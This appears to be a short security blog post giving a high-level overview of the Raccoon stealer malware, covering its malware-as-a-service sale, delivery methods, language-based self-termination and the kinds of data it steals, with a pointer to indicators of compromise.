Racoon Malware

Racoon is a malware-as-a-service (MaaS) spyware offered through a number of dark web forums. Researcher first spotted Raccoon in April 2019. The malware, written in C++, leverages several potential delivery methods. It has quickly risen to become one of the most observed malware due to a combination of low cost, ease-of-use, and 24/7 support.

As with most MaaS tools, Racoon can be delivered through a number of vectors chosen by its operators. At the time of publication, it has been distributed via spam and phishing campaigns, exploit kits, compromised third-party applications, and supply chain compromises. Racoon is provided to operators as a malicious Microsoft Office document containing a number of PowerShell scripts which, when opened, will connect to a command and control (C2) server to download Racoon.

Once installed, Racoon will first check the system language and will terminate itself if Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik, or Uzbek languages are detected. It will then collect system and user information and send it to a separate C2 server before awaiting further commands. Racoon is able to extract information from cache files, web browsers, mail clients, and cryptocurrency wallets; as well as capturing audio and video from webcam.

You can read more on this malware here

Raccoon Stealer – Indicators of Compromise


Jason Davies

UK based technology professional, with an interest in computer security and telecoms.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: